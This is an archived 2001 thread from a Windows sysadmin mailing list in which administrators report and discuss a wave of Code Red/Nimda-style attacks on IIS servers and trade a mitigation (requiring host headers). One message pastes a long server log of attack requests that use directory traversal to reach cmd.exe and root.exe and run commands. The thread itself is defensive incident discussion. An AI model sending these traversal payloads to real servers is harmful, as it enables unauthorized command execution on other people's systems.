http://www.sunbelt-software.com/ntsysadmin_list_charter.htm-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 11:40 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker AlertHow do you do that?
-----Original Message-----
From: Kevin Lundy [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 8:26 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert
looks like an exploit of the "Hacked by Chinese" type from several months
ago.None of my servers have shown attempts.
One easy way to stop most of the IIS probing is to simply require host
headers on all sites. If your server doesn't respond when the get/put
commands use an IP number, then most vulnerabilities aren't "vulnerable".
Then any scans would need to be done via DNS rather than random IP numbers,
significantly slowing attacks.-----Original Message-----
From: Martin Blackstone [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 11:19 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert
Here is a site that has been hit
http://216.39.178.32-----Original Message-----
From: Jason Morris [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 7:59 AM
To: NT System Admin Issues
Subject: RE: WARNING: Hacker Alert
CodeRed seems to have dwindled to nothing on my logs. But it's being
replaced with the EXACT same lines you have below, and they stay
consistent with the code red 2 methods of attacking the more local
subnets.Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]
-----Original Message-----
From: Jason Morris [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:50 AM
To: NT System Admin Issues
Cc: '[EMAIL PROTECTED]'
Subject: RE: WARNING: Hacker Alert
Yes. It seems to be systems I have previously monitored hitting me with
codered attacks. I bet someone is activating all of their children.Jason Morris CCDA CCNP
Network Administrator
MJMC, Inc.
708-225-2350
[EMAIL PROTECTED]
-----Original Message-----
From: xylog [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 9:45 AM
To: NT System Admin Issues
Subject: WARNING: Hacker Alert
All my public facing web servers at home and at my office have shown a
huge continuous hacking activity. Has anyone seen similar? I fear this
may be code red related or automated. Please comment if you have seen
similar. Here is an excerpt from one logfile:63.101.9.107, -, 9/18/01, 10:36:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145,
0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..� ../..� ../..� ../winnt/system32/cmd.exe
, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
604, 404, 3, GET, /scripts/..� ../winnt/system32/cmd.exe, /c+dir,
63.101.9.107, -, 9/18/01, 10:36:28, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97,
604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir, 63.101.9.107,
-, 9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3,
GET, /winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01,
10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -, 9/18/01, 10:36:32,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -,
9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -,
9/18/01, 10:36:32, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.9.107, -,
9/18/01, 10:36:33, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -,
9/18/01, 10:36:42, W3SVC4, DC1DIIS01, x.x.x.x, 156, 41, 13975, 200, 0,
GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -, 9/18/01, 10:37:02,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET, /scripts/root.exe,
/c+dir, 63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01,
x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80,
604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:02, W3SVC4, DC1DIIS01, x.x.x.x, 15, 80, 604, 404, 3, GET,
/d/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:06,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0,
117, 0, 500, 87, GET,
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 0,
145, 0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..� ../..� ../..� ../winnt/system32/cmd.exe
, /c+dir,
63.101.171.231, -, 9/18/01, 10:37:09, W3SVC4, DC1DIIS01, x.x.x.x, 15,
97, 604, 404, 3, GET, /scripts/..� ../winnt/system32/cmd.exe, /c+dir,
64.156.252.27, -, 9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 156,
41, 13975, 200, 0, GET, /mpf-flow/flow/login.cfm, -, 63.101.171.231, -,
9/18/01, 10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET,
/scripts/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01,
10:37:12, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -, 9/18/01, 10:37:13,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:13, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.101.171.231, -,
9/18/01, 10:37:17, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -,
9/18/01, 10:37:21, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72, 604, 404, 3, GET,
/scripts/root.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:22, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET, /MSADC/root.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:24, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80,
604, 404, 3, GET, /c/winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -,
9/18/01, 10:37:26, W3SVC4, DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET,
/d/winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -, 9/18/01, 10:37:28,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.230.208.17, -,
9/18/01, 10:37:34, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117, 0, 500, 87, GET,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:36, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117,
0, 500, 87, GET,
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.230.208.17, -, 9/18/01, 10:37:42, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145,
0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..� ../..� ../..� ../winnt/system32/cmd.exe
, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 72,
604, 404, 3, GET, /scripts/root.exe, /c+dir, 63.114.34.130, -, 9/18/01,
10:39:37, W3SVC4, DC1DIIS01, x.x.x.x, 0, 70, 604, 404, 3, GET,
/MSADC/root.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:37, W3SVC4,
DC1DIIS01, x.x.x.x, 0, 80, 604, 404, 3, GET, /c/winnt/system32/cmd.exe,
/c+dir, 63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x,
0, 80, 604, 404, 3, GET, /d/winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96,
0, 500, 87, GET, /scripts/..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:38, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117,
0, 500, 87, GET,
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 0, 117,
0, 500, 87, GET,
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 0, 145,
0, 500, 87, GET,
/msadc/..%5c../..%5c../..%5c/..� ../..� ../..� ../winnt/system32/cmd.exe
, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:39, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97,
604, 404, 3, GET, /scripts/..� ../winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:41, W3SVC4, DC1DIIS01, x.x.x.x, 16, 97,
604, 404, 3, GET, /scripts/winnt/system32/cmd.exe, /c+dir,
63.114.34.130, -, 9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 15, 97,
604, 404, 3, GET, /winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -,
9/18/01, 10:39:44, W3SVC4, DC1DIIS01, x.x.x.x, 0, 97, 604, 404, 3, GET,
/winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -, 9/18/01, 10:39:44,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 98, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 64.156.252.27, -,
9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 172, 41, 13973, 200, 0,
GET, /mpf-flow/flow/login.cfm, -, 63.114.34.130, -, 9/18/01, 10:39:45,
W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -,
9/18/01, 10:39:45, W3SVC4, DC1DIIS01, x.x.x.x, 0, 100, 0, 500, 87, GET,
/scripts/..%5c../winnt/system32/cmd.exe, /c+dir, 63.114.34.130, -,
9/18/01, 10:39:47, W3SVC4, DC1DIIS01, x.x.x.x, 0, 96, 0, 500, 87, GET,
/scripts/..%2f../winnt/system32/cmd.exe, /c+dir,
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Confidential: This e-mail and any files transmitted with it are the
property of Lanco International and/or its affiliates, are confidential,
and are intended solely for the use of the individual or entity to whom
this e-mail is addressed. If you are not one of the named recipient(s)
or otherwise have reason to believe that you have received this message
in error, please notify the sender at the above e-mail address and
delete this message immediately from your computer. Any other use,
retention, dissemination, forwarding, printing or copying of this e-mail
is strictly prohibited.http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Confidential: This e-mail and any files transmitted with it are the
property of Lanco International and/or its affiliates, are confidential,
and are intended solely for the use of the individual or entity to whom
this e-mail is addressed. If you are not one of the named recipient(s)
or otherwise have reason to believe that you have received this message
in error, please notify the sender at the above e-mail address and
delete this message immediately from your computer. Any other use,
retention, dissemination, forwarding, printing or copying of this e-mail
is strictly prohibited.http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
http://www.sunbelt-software.com/ntsysadmin_list_charter.htm
Title: RE: WARNING: Hacker Alert
In the
web site properties, identification, advanced, don't have an entry that doesn't
have a host header. The only negative that I can think of is browsers of
approximately Version 2 series can't connect. Considering that IE 6 and
Netscape are long past that, the impact is minimal.
- RE: WARNING: Hacker Alert Admin
- RE: WARNING: Hacker Alert John Cesta - Lists
- RE: WARNING: Hacker Alert xylog
- RE: WARNING: Hacker Alert Randal, Phil
- RE: WARNING: Hacker Alert Laura Swartout
- RE: WARNING: Hacker Alert RZorz
- RE: WARNING: Hacker Alert Martin Blackstone
- RE: WARNING: Hacker Alert andrey_kalinin
- RE: WARNING: Hacker Alert bobj
- RE: WARNING: Hacker Alert Jason Morris
- RE: WARNING: Hacker Alert Kevin Lundy
- RE: WARNING: Hacker Alert Luke Brumbaugh
- RE: WARNING: Hacker Alert Jerry Gamblin
- RE: WARNING: Hacker Alert Marr, Chris
- RE: WARNING: Hacker Alert Terry Manolakos
- Re: WARNING: Hacker Alert Kelly Borndale
- RE: WARNING: Hacker Alert Nelson Aguillon
- RE: WARNING: Hacker Alert Luke Brumbaugh
- RE: WARNING: Hacker Alert Witt, Michael S
- RE: WARNING: Hacker Alert Gan Kim Teng
- RE: WARNING: Hacker Alert Mark Kelsay
